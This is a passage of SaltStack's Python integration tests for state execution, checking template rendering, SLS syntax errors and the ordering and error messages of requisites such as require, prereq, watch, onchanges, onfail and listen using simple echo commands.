ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# an undetected infinite loop prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why does require enforce list syntax while require_in does not?
# And why prevent it at all?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 is resolved, these tests might become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
